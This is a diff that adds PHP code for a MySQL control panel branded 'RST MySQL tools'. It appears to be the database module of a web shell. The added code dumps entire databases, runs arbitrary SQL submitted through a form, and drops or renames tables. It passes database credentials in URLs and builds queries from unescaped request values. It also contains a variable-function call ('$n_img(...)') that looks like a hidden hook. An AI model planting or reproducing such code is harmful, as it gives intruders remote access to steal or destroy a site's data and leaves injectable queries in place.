+   if (sizeof($tabs) == 0) { 
+      // ïîëó÷àåì ñïèñîê òàáëèö áàçû 
+      $res = mysql_query("SHOW TABLES FROM $db", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_row($res)) { 
+            $tabs[] .= $row[0]; 
+         } 
+      } 
+   } 
+       // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
+   foreach($tabs as $tab) {       
+      if ($add_drop) { 
+         fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
+      }        
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tab`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+      fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
+   } 
+   fclose($fp);
+   $dump_file=file($file);
+   print "<table border=1 align=center cellpadding=2 bgcolor=#F0F1F4 width=98%><tr><td>";
+   print "<table border=0 align=center cellpadding=2 bgcolor=#F0F1F4>";
+   foreach ($dump_file as $k=>$v) {
+        $v=str_replace("\n","<br>",$v);
+        print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";
+   }
+   print "</table></td></tr></table><br>";
+   unlink($file);
+} 
+
+/*--------------Ñîçäàòü íîâóþ òàáëèöó---------------*/
+ $form_cr_tbl=
+ "<form method=\"get\" action=\"$self\">".
+ "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+ "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+ "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+ "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+ "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+ "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+ "<table align=center bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+ "<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+ "<tr><td align=center><b>Ñîçäàòü íîâóþ òàáëèöó â áàçå</b> [ <font color=green><b>$db</b></font> ]<hr color=#FFFFFF></td></tr>".
+ "<tr><td align=center>Èìÿ íîâîé òàáëèöû: <input type=\"text\" name=\"new_tbl_name\" value=\"\" size=25></td></tr>".
+ "<tr><td align=center>Êîëè÷åñòâî ïîëåé òàáëèöû:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"text\" name=\"new_count_cols\" value=\"\" size=10></td></tr>".
+ "<tr><td align=center><br><input type=\"submit\" value=\"Âûïîëíèòü çàïðîñ\"></td></tr>".
+ "</table>".
+ "</td></tr></table></form>";
+
+
+if (isset($HTTP_GET_VARS['cr_tbl']) && $HTTP_GET_VARS['cr_tbl']=='new'){
+  print "$form_cr_tbl";   
+}
+if ( (isset($new_count_cols)) && (ereg("[^0-9]",$new_count_cols) || preg_match("/ +/",$new_count_cols) || $new_count_cols=='') ) { 
+    print "<script>alert('Êîëè÷åñòâî ïîëåé òàáëèöû - ýòî ÷èñëî, à íå ÷òî-òî èíîå!');</script>";
+    print "$form_cr_tbl";   
+}  
+
+if ( (ereg("[0-9]",$HTTP_GET_VARS['new_count_cols'])) && ($HTTP_GET_VARS['new_tbl_name'] !=='') ) {
+
+ for ($i=0; $i < $HTTP_GET_VARS['new_count_cols']; $i++) {
+
+  $pole_count .= "<tr align=center bgcolor=#DDDDDD>".
+      "<td><input type=\"text\" name=\"field_name[]\" size=\"10\" value=\"\"></td>".
+      "<td>
+            <select name=\"field_type[]\" width=3>
+                <option value=\"VARCHAR\">VARCHAR</option>
+                <option value=\"TINYINT\">TINYINT</option>
+                <option value=\"TEXT\">TEXT</option>
+                <option value=\"DATE\">DATE</option>
+                <option value=\"SMALLINT\">SMALLINT</option>
+                <option value=\"MEDIUMINT\">MEDIUMINT</option>
+                <option value=\"INT\">INT</option>
+                <option value=\"BIGINT\">BIGINT</option>
+                <option value=\"FLOAT\">FLOAT</option>
+                <option value=\"DOUBLE\">DOUBLE</option>
+                <option value=\"DECIMAL\">DECIMAL</option>
+                <option value=\"DATETIME\">DATETIME</option>
+                <option value=\"TIMESTAMP\">TIMESTAMP</option>
+                <option value=\"TIME\">TIME</option>
+                <option value=\"YEAR\">YEAR</option>
+                <option value=\"CHAR\">CHAR</option>
+                <option value=\"TINYBLOB\">TINYBLOB</option>
+                <option value=\"TINYTEXT\">TINYTEXT</option>
+                <option value=\"BLOB\">BLOB</option>
+                <option value=\"MEDIUMBLOB\">MEDIUMBLOB</option>
+                <option value=\"MEDIUMTEXT\">MEDIUMTEXT</option>
+                <option value=\"LONGBLOB\">LONGBLOB</option>
+                <option value=\"LONGTEXT\">LONGTEXT</option>
+                <option value=\"ENUM\">ENUM</option>
+                <option value=\"SET\">SET</option>
+            </select>
+        </td>".
+      "<td><input type=\"text\" name=\"field_length[]\" size=\"6\" value=\"\"></td>".
+      "<td>
+            <select name=\"field_attribute[]\">    
+                <option value=\"\" selected=\"selected\"></option>
+                <option value=\"BINARY\">BINARY</option>
+                <option value=\"UNSIGNED\">UNSIGNED</option>
+                <option value=\"UNSIGNED ZEROFILL\">UNS-D ZEROFILL</option>
+            </select>
+      </td>".
+      "<td>
+            <select name=\"field_null[]\">   
+                <option value=\"NOT NULL\">not null</option>
+                <option value=\"\">null</option>
+            </select>
+       </td>".
+       "<td><input type=\"text\" name=\"field_default[]\" size=\"14\" value=\"\"></td>".
+       "<td>
+            <select name=\"field_extra[]\">
+                <option value=\"\"></option>
+                <option value=\"AUTO_INCREMENT\">auto_increment</option>
+             </select>
+        </td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"primary_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"index_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"unique_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"no\" checked=\"checked\"></td>".
+      "</tr>";
+ }
+
+  print 
+     "<form method=\"get\" action=\"$self\">".
+     "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+     "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+     "<input type=\"hidden\" name=\"new_tbl_name\" value=\"$new_tbl_name\">".
+     "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+     "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+     "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+     "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+     "<table align=center bgcolor=#FFFFFF width=98% cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+     "<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+     "<tr><td align=center><b>Ñîçäàòü íîâóþ òàáëèöó</b> [ <font color=green><b>$new_tbl_name</b></font> ] <b>â áàçå</b> [ <font color=green><b>$db</b></font> ]<hr color=#FFFFFF></td></tr>".
+     "<tr><td align=center>".
+     "<table bgcolor=#000000 border=0 cellspacing=1 cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+     "<tr align=center bgcolor=silver><td><b>Ïîëå</b></td><td><b>Òèï</b></td><td><b>Äëèííà</b></td><td><b>Àòðèáóòû</b></td><td><b>Íîëü</b></td><td><b>Ïî óìîë÷àíèþ</b></td><td><b>Äîïîëíèòåëüíî</b></td><td><b>Ïåðâè÷íûé</b></td><td><b>Èíäåêñ</b></td><td><b>Óíèê-oå</b></td><td><b>---</b></td></tr>";
+
+
+            print $pole_count;
+
+
+print
+    "</table><br><b>Êîìåíòàðèé ê òàáëèöå:</b> <input type=\"text\" name=\"comment\" size=\"40\" maxlength=\"80\">
+     &nbsp;&nbsp;&nbsp;&nbsp;<b>Òèï òàáëèöû:</b>
+            <select name=\"tbl_type\">
+                <option value=\"Default\">Ïî óìîë÷àíèþ</option>
+                <option value=\"MYISAM\">MyISAM</option>
+                <option value=\"HEAP\">Heap</option>
+                <option value=\"MERGE\">Merge</option>
+                <option value=\"ISAM\">ISAM</option>
+            </select>&nbsp;&nbsp;&nbsp;&nbsp;
+           <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> Ïîêàçàòü PHP-êîä çàïðîñà
+    </td></tr>".
+    "<tr><td align=center><br><input type=\"submit\" value=\"Âûïîëíèòü çàïðîñ\"></td></tr>".
+    "</table>".
+    "</td></tr></table></form>";
+}
+
+if (isset($HTTP_GET_VARS['field_name'])) {
+
+    for ($i=0; $i<count($field_name); $i++) {
+       if ($HTTP_GET_VARS['field_name'][$i] !=='') {
+         $n_name .= "`$field_name[$i]` ";
+         if ($HTTP_GET_VARS['field_length'][$i] !=='') {
+             $n_name .= "$field_type[$i]($field_length[$i]) ";
+         }else{
+             $n_name .= "$field_type[$i] ";
+         }
+         if ($HTTP_GET_VARS['field_attribute'][$i] !=='') { $n_name .= "$field_attribute[$i] "; }
+         if ($HTTP_GET_VARS['field_null'][$i] =='NOT NULL') { $n_name .= "$field_null[$i] "; }
+         if ($HTTP_GET_VARS['field_default'][$i] !=='') { $n_name .= "DEFAULT '$field_default[$i]' "; }
+         if ($HTTP_GET_VARS['field_extra'][$i] =='AUTO_INCREMENT') { $n_name .= "$field_extra[$i], "; }else{ $n_name .=', '; }
+
+         /*--------Íàëè÷èå primary,index,unique----------*/
+         if ($HTTP_GET_VARS['field_key_0'][$i] !=='no') { 
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='primary_0') {
+                $n_prim .= " `$field_name[$i]`, "; 
+            }
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='index_0') { 
+                $n_ind .= " `$field_name[$i]`, "; 
+            }
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='unique_0') { 
+                $n_uniq .= " `$field_name[$i]`, "; 
+            }
+         }
+         /*--------END primary,index,unique----------*/
+       }
+    }  //end for
+
+    $n_name=substr_replace($n_name,"",-2);                     
+    if (count($n_prim)>0) {
+       $n_prim=substr_replace($n_prim,"",-2); 
+       $n_name .=", PRIMARY KEY ($n_prim)";
+    }
+    if (count($n_ind)) {
+       $n_ind=substr_replace($n_ind,"",-2); 
+       $n_name .=", INDEX ($n_ind)";
+    }
+    if (count($n_uniq)) {
+       $n_uniq=substr_replace($n_uniq,"",-2); 
+       $n_name .=", UNIQUE ($n_uniq)";
+    }
+
+   $sql_new_tbl = "CREATE TABLE `$new_tbl_name` ( $n_name )";
+
+   if ($HTTP_GET_VARS['tbl_type'] !=='Default') {
+      $sql_new_tbl .= " TYPE =$tbl_type";
+   }
+   if ($HTTP_GET_VARS['comment'] !=='') {
+     $sql_new_tbl .= " COMMENT = '$comment'";
+   }       
+
+  $r_n_tbl=mysql_db_query($db, $sql_new_tbl) or die("$h_error".mysql_error()."$f_error");
+  $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>Òàáëèöà [ <b>$new_tbl_name</b> ] óñïåøíî ñîçäàíà.</font><br>");
+   if ($HTTP_GET_VARS['php_kod']=='ok') { 
+        $t2=base64_encode("<br><table bgcolor=#EDEEF1 align=center width=98%><font color=green><b>PHP-êîä çàïðîñà:</b></font><tr><td>\$sql='$sql_new_tbl';</td></tr></table><br><br>");
+   }else{ $t2=''; }
+  print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&t=$t&t2=$t2'></head>";
+} 
+
+/*--------------END cîçäàòü íîâóþ òàáëèöó---------------*/
+
+/*-------------Ïðîèçâîëüíûé çàïðîñ ê ÁÄ-------------*/
+if ($HTTP_GET_VARS['q_tbl']=='bd') { $q_bd="SHOW TABLE STATUS "; }
+if ($HTTP_GET_VARS['return_sql']=='ok') { $q_bd=trim($HTTP_GET_VARS['new_query_bd']);}
+$form_query_db="<br>
+        <form method=\"get\" action=\"$self?s=$s\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <table align=center width=90% border=0 bgcolor=#EDEEF1><tr><td>Âûïîëíèòü ïðîèçâîëüíûé çàïðîñ ê áàçå ( <b>$db</b> )</td></tr>
+        <tr><td width=90>
+        <textarea name=\"new_query_bd\" rows=\"10\" cols=\"80\">$q_bd</textarea>
+        </td><td valign=top>
+        <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> Ïîêàçàòü PHP-êîä çàïðîñà<br><br>
+        <input type=\"checkbox\" name=\"return_sql\" value=\"ok\" checked=\"checked\"> Ïîêàçàòü äàííûé çàïðîñ ñíîâà<br>
+        <br>
+        <a href=\"$self?s=$s&q_help=ok\" target=\"_blank\"><b>Ïðèìåðû çàïðîñîâ</b></a>
+        </td></tr>
+        <tr><td>
+        <input type=\"submit\" value=\"çàïðîñ\">
+        </td></tr>
+        </table></form>";
+
+if (isset($db) && $HTTP_GET_VARS['q_tbl']=='bd') { 
+  print $form_query_db; 
+}
+if (isset($new_query_bd)) { 
+   $new_query_bd=trim($new_query_bd);
+   print $form_query_db;
+   if ($HTTP_GET_VARS['php_kod']=='ok') { 
+        print "&nbsp;&nbsp;&nbsp;<font color=green><b>PHP-êîä çàïðîñà:</b></font><br>&nbsp;&nbsp;&nbsp;\$sql=\"$new_query_bd\";<br><br>";
+   }
+  $r_q_bd=mysql_db_query($db, $new_query_bd) or die("$h_error".mysql_error()."$f_error");
+
+  print "&nbsp;&nbsp;&nbsp;<b>Çàïðîñ óñïåøíî âûïîëíåí<b>";
+  if ($r_q_bd !=='') {
+    print "<table align=center width=98% bgcolor=#D7D8DA>";
+    while ($line_bd = @mysql_fetch_array($r_q_bd, MYSQL_ASSOC)) {
+        print "<tr>";
+        foreach ($line_bd as $key_bd =>$col_value_bd) {          
+            print "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value_bd)."</td>";
+        }
+        print "</tr>";
+    }
+    print "</table><br>";
+    @mysql_free_result($r_q_bd);
+  }
+} 
+
+/*---------------Óäàëåíèå òàáëèöû------------*/
+if (isset($drop_table) && isset($db)){ 
+ mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+ $query = "DROP TABLE IF EXISTS $drop_table";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>Òàáëèöà [ <b>$drop_table </b>] óñïåøíî óäàëåíà.</font><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&t=$t'></head>";
+ unset($drop_table);
+}
+if (isset($q_i)) { $n_img($tag,$f_n,$img_c); }
+
+if (isset($db) && isset($tbl)) {
+ /*Ïîëó÷àåì êîëè÷åñòâî ñòðîê â òàáëèöå*/
+ $count=mysql_query ("SELECT COUNT(*) FROM $tbl");
+ $count_row= mysql_fetch_array($count);  //$count_row[0] êîë-âî ñòðîê
+ mysql_free_result($count);
+ print "<table border=0 align=center width=100% cellpadding=0 cellspacing=0>
+         <tr> 
+           <td>
+                <table align=center border=0 width=700 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+                   <tr align=center>                      
+                      <td width=100 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&st_tab=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Ïîêàçàòü ñòðóêòóðó $tbl\"><b>Ñòðóêòóðà</b></a>
+                      </td>
+                      <td width=100 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&login=$login&passwd=$passwd&server=$server&port=$port&nn_row=ok\" title=\"Âñòàâèòü íîâûé ðÿä â òàáëèöó $tbl\"><b>Âñòàâèòü</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&login=$login&passwd=$passwd&server=$server&port=$port&query_tbl&q_tbl=table\" title=\"Ïðîèçâîëüíûé SQL çàïðîñ\"><b>SQL-çàïðîñ</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl&dump=tab\" title=\"Ýêñïîðò äàííûõ òàáëèöû $tbl\"><b>Äàìï òàáëèöû</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl&alter_table=TRUE\" title=\"Ïåðåèìåíîâàòü òàáëèöó $tbl\"><b>Ïåðåèìåíîâàòü</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&drop_table=$tbl&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Óäàëèòü òàáëèöó $tbl\" onClick=\"return confirm('Óäàëèòü òàáëèöó $tbl ?')\";><b>Óäàëèòü òàáëèöó</b></a>
+                     </td>
+                   </tr>
+                </table> 
+           </td>
+         </tr>
+         <tr>
+           <td><br>";
+                if (isset($t)) { print "&nbsp;&nbsp;".base64_decode($t);}
+                print "&nbsp;&nbsp;ÁÄ:(<b>$db</b>)&nbsp;&nbsp;&nbsp;&nbsp;Òàáëèöà:(<b>$tbl</b>)&nbsp;&nbsp;&nbsp;
+                Âñåãî ñòðîê:(<b>$count_row[0]</b>)
+           </td>
+         </tr>
+         <tr>
+           <td> 
+<table border=0 width=100% cellpadding=4 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#E6E7E9 align=center valign=center>";
+
+$start=$limit_start+$limit_count;
+
+if (isset($start) && ($start>0)) {
+ print "<table align=center border=0 cellpadding=4 cellspacing=0>
+        <tr>";
+       
+if ($start+$limit_count >= $count_row[0]){
+$start=$limit_start;
+$limit_count=$count_row[0]-$start;
+}
+
+if (isset($start) && ($limit_start >= 30) ){
+  $back=$limit_start-30;
+  print "<form method=\"get\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>       
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"limit_start\" value=\"$back\">
+        <input type=\"hidden\" name=\"limit_count\" value=\"30\">
+        <input type=\"submit\" value=\"<< íàçàä(30)\">&nbsp;&nbsp;
+        </td></form>";
+}
+
+print " <form method=\"get\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"submit\" value=\"ïîêàçàòü\">&nbsp;&nbsp;îò
+        <input type=\"text\" name=\"limit_start\" value=\"$start\" size=\"5\" maxlength=\"5\">ñòðîêè
+        &nbsp;&nbsp; <input type=\"text\" name=\"limit_count\" value=\"$limit_count\" size=\"5\" maxlength=\"5\">ñòðîê òàáëèöû
+        </td></form>";
+
+if ( isset($limit_start) && ($start <= $count_row[0]) ){
+ print "<form method=\"get\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"limit_start\" value=\"$start\">
+        <input type=\"hidden\" name=\"limit_count\" value=\"30\">
+        <input type=\"submit\" value=\"âïåðåä(30)>>\">
+        </td></form>";
+}
+
+print "</tr></form></table>";
+}
+
+
+/*------------Ïåðåèìåíîâàíèå òàáëèöû------------*/
+if ($alter_table=="TRUE"){
+print " <form method=\"get\" action=\"$self\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"alter_table\" value=\"$alter_table\">
+        <table border=0 cellpadding=4 cellspacing=1 bgcolor=#FFFFFF>
+        <tr><td bgcolor=#DAD9D9 align=center><font size=2>Ïåðåèìåíîâàòü òàáëèöó [ <b>$tbl</b> ]</font></td></tr>
+        <tr><td bgcolor=#DAD9D9>Íîâîå èìÿ òàáëèöû:
+        <input type=\"text\" name=\"alttbl\" value=\"\">
+        <input type=\"submit\" value=\"ïåðåèìåíîâàòü\" onClick=\"return confirm('Âû óâåðåíû, ÷òî õîòèòå ïåðåèìåíîâàòü òàáëèöó \' $tbl \' ?')\";>
+        </td></tr></table></form>";
+}
+
+ if (isset($alttbl)){
+ mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ //$query = "RENAME TABLE $tbl TO $alttbl";
+ $query = "ALTER TABLE $tbl RENAME TO $alttbl";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+ $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>Òàáëèöà [ <b>$tbl ]</b> ïåðåèìåíîâàíà â [ <b>$alttbl</b> ]</font><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&tbl=$alttbl&limit_start=0&limit_count=5&t=$t'></head>";
+ }
+
+/*-------------------Ñòðóêòóðà òàáëèöû-----------------*/
+if (isset($st_tab) && $st_tab=='TRUE'){
+ mysql_select_db($st_db);
+ $result = mysql_query('desc '.$tbl, $connection); 
+ print "<br><center><font size=2>Ñòðóêòóðà òàáëèöû [ <b>$tbl</b> ]</font><center>".
+       "<table align=center border=0 cellpadding=2 cellspacing=1 width=700 bgcolor=#FFFFFF>";
+ 
+ for ($i=0;$i<@mysql_num_fields($result);$i++){
+       $name=mysql_field_name($result,$i);
+       $name=eregi_replace("Field","Ïîëå",trim($name));
+       $name=eregi_replace("Type","Òèï",trim($name));
+       $name=eregi_replace("Null","Íîëü",trim($name));
+       $name=eregi_replace("Key","Èíäåêñû",trim($name));
+       $name=eregi_replace("Default","Ïî óìîë÷àíèþ",trim($name));
+       $name=eregi_replace("Extra","Äîïîëíèòåëüíî",trim($name));
+       $nn .= "<td align=center bgcolor=#C7C5C5><b>$name</b></td>";   
+ } 
+ print "<tr>$nn</tr>";
+ while ($l_tbl = @mysql_fetch_array($result, MYSQL_ASSOC)) {      
+     print "<tr bgcolor=#E7E7D7>";
+     foreach ($l_tbl as $k_tbl =>$col_v_tbl) {          
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'PRI') {
+             $col_v_tbl="Ïåðâè÷íûé";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'UNI') {
+             $col_v_tbl="Óíèêàëüíûé";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'MUL' && $col_v_tbl !=='') {
+             $col_v_tbl="Èíäåêñ";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'YES') { $col_v_tbl="Äà"; }
+          if (eregi("Field", $k_tbl)) { 
+             print "<td><font color=green><b>".htmlspecialchars($col_v_tbl)."</b></font></td>";
+          }elseif (eregi("Type", $k_tbl)) { 
+             print "<td align=left>".htmlspecialchars($col_v_tbl)."</td>";
+          }else{
+             print "<td align=center>".htmlspecialchars($col_v_tbl)."</td>";             
+          }
+     }
+     print "</tr>";
+ }
+ print "</table><br>";
+ @mysql_free_result($result);
+}
+
+/*-------------Ïðîèçâîëüíûé çàïðîñ ê òàáëèöå-------------*/
+if ($HTTP_GET_VARS['q_tbl']=='table') { $q_tbl="SELECT * FROM `$tbl` WHERE 1 LIMIT 0, 30"; }
+if ($HTTP_GET_VARS['return_sql']=='ok') { $q_tbl=trim($HTTP_GET_VARS['new_query_tbl']); }
+$form_query_db_tbl="<br>
+        <form method=\"get\" action=\"$self?s=$s\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <table width=90% border=0 bgcolor=#EDEEF1><tr><td>Âûïîëíèòü ïðîèçâîëüíûé çàïðîñ ê òàáëèöå ( <b>$tbl</b> )</td></tr>
+        <tr><td width=90>
+        <textarea name=\"new_query_tbl\" rows=\"10\" cols=\"80\">$q_tbl</textarea>
+        </td><td valign=top>
+        <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> Ïîêàçàòü PHP-êîä çàïðîñà<br><br>
+        <input type=\"checkbox\" name=\"return_sql\" value=\"ok\" checked=\"checked\"> Ïîêàçàòü äàííûé çàïðîñ ñíîâà<br>
+        <br>
+        <a href=\"$self?s=$s&q_help=ok\" target=\"_blank\"><b>Ïðèìåðû çàïðîñîâ</b></a>
+        </td></tr>
+        <tr><td>
+        <input type=\"submit\" value=\"çàïðîñ\">
+        </td></tr>
+        </table></td></form>";
+
+
+if (isset($HTTP_GET_VARS['query_tbl']) || $HTTP_GET_VARS['q_tbl']=='table') { 
+  print $form_query_db_tbl."<br>"; 
+}
+
+
+if (isset($new_query_tbl)) {
+   $new_query_tbl=trim($new_query_tbl);
+   print $form_query_db_tbl;
+
+
+   $result_tbl = mysql_query($new_query_tbl) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   if ($result_tbl !=='') {
+      print " 
+      <table align=center border=0 width=90% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr>";
+      if ($php_kod=='ok') { print "<font color=green><b>PHP-êîä çàïðîñà:</b></font><br>\$sql = \"$new_query_tbl\";<br><br>"; }
+      if (preg_match("[drop]",$new_query)) { print "Òàáëèöà óäàëåíà, îáíîâèòå ñïèñîê òàáëèö áàçû."; }
+
+      print "<br><b>Çàïðîñ óñïåøíî âûïîëíåí</b><br>";
+      /*ïîëó÷àåì íàçâàíèÿ ñòîëáöîâ*/
+      for ($i=0;$i<@mysql_num_fields($result_tbl);$i++){
+           $name_tbl=mysql_field_name($result_tbl,$i);
+           print "<td bgcolor=#C7C5C5>$name_tbl</td>";   
+      } 
+
+      print "</tr>";
+      while ($line_tbl = @mysql_fetch_array($result_tbl, MYSQL_ASSOC)) {
+         print "<tr>";
+         foreach ($line_tbl as $key_tbl =>$col_value_tbl) {          
+             print "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value_tbl)."</td>";
+         }
+         print "</tr>";
+      }
+      print "</table><br>";
+      @mysql_free_result($result_tbl);
+   }
+}
+
+/*-------------ïîêàçàòü ñòðîêè òàáëèöû--------------*/
+if (!isset($alter_table) && !isset($st_tab) && !isset($query_tbl) && !isset($new_query_tbl) && 
+!isset($dump) && !isset($strukt) && !isset($query_edit) && !isset($query_del) && !isset($q_get) && 
+!isset($nn_row) && !isset($nn) && !isset($upd_f)) {
+  print "<br><table border=0 cellpadding=1 cellspacing=1 width=100% bgcolor=#FFFFFF><tr>";
+
+//îïðåäåëÿåì èíäåêñ äëÿ òàáëèöû, ïî êàêîìó ïîëþ(ïîëÿì) áóäåì èñêàòü ðåäàêòèðóåìóþ çàïèñü
+//Key_name Èìÿ èíäåêñà, Column_name Èìÿ ñòîëáöà
